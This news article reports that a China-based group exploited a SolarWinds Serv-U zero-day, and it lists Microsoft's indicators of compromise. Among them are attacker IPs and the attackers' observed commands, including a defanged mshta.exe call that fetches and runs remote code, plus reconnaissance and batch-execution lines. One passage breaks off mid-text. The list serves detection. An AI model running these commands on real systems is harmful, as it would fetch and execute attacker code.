SolarWinds 0-day gave Chinese hackers privileged access to customer servers

SolarWinds 0-day gave Chinese hackers privileged access to customer servers

Getty Images

reader comments

12 with 11 posters participating

Microsoft said on Tuesday that hackers operating in China exploited a zero-day vulnerability in a SolarWinds product. According to Microsoft, the hackers were, in all likelihood, targeting software companies and the US Defense industry.

SolarWinds disclosed the zero-day on Monday, after receiving notification from Microsoft that it had discovered that a previously unknown vulnerability in the SolarWinds Serv-U product line was under active exploit. Austin, Texas-based SolarWinds provided no details about the threat actor behind the attacks or how their attack worked.

Commercial VPNs and compromised consumer routers

On Tuesday, Microsoft said it was designating the hacking group for now as “DEV-0322.” “DEV” refers to a “development group” under study prior to when Microsoft researchers have a high confidence about the origin or identity of the actor behind an operation. The company said that the attackers are physically located in China and often rely on botnets made up of routers or other types of IoT devices.

“MSTIC has observed DEV-0322 targeting entities in the US Defense Industrial Base Sector and software companies,” researchers with the Microsoft Threat Intelligence Center wrote in a post. “This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure.”

Beyond the three attacker-affiliated servers already disclosed by SolarWinds, Microsoft provided three additional indicators that people can use to determine if they were hacked. The indicators of compromise are:

  • 98[.]176[.]196[.]89
  • 68[.]235[.]178[.]32
  • 208[.]113[.]35[.]58
  • 144[.]34[.]179[.]162
  • 97[.]77[.]97[.]58
  • hxxp://144[.]34[.]179[.]162/a
  • C:WindowsTempServ-U.bat
  • C:WindowsTemptestcurrent.dmp
  • The presence of suspicious exception errors, particularly in the DebugSocketlog.txt log file
  • C:WindowsSystem32mshta.exe http://144[.]34[.]179[.]162/a (defanged)
  • cmd.exe /c whoami > “./Client/Common/redacted.txt”
  • cmd.exe /c dir > “.ClientCommonredacted.txt”
  • cmd.exe /c “C:WindowsTempServ-U.bat”
  • powershell.exe C:WindowsTempServ-U.bat
  • cmd.exe /c type \redactedredacted.Archive > “C:ProgramDataRhinoSoftServ-UUsersGlobal Usersredacted.Archive”

roughly 18,000 customers of the company’s Orion network management tool.

Of those 18,000 customers, about nine of them in US government agencies and about 100 of them in private industry received follow-on malware. The federal government has attributed the attacks to Russia’s Foreign Intelligence Service, which is abbreviated as the SVR. For more than a decade, the SVR has conducted malware campaigns targeting governments, political think tanks, and other organizations around the world.

The zero-day attacks that Microsoft discovered and reported are unrelated to the Orion supply chain attack.

SolarWinds patched the vulnerability over the weekend. Anyone running a vulnerable version of Serv-U should update immediately and check for signs of compromise.

Article Tags:
Article Categories: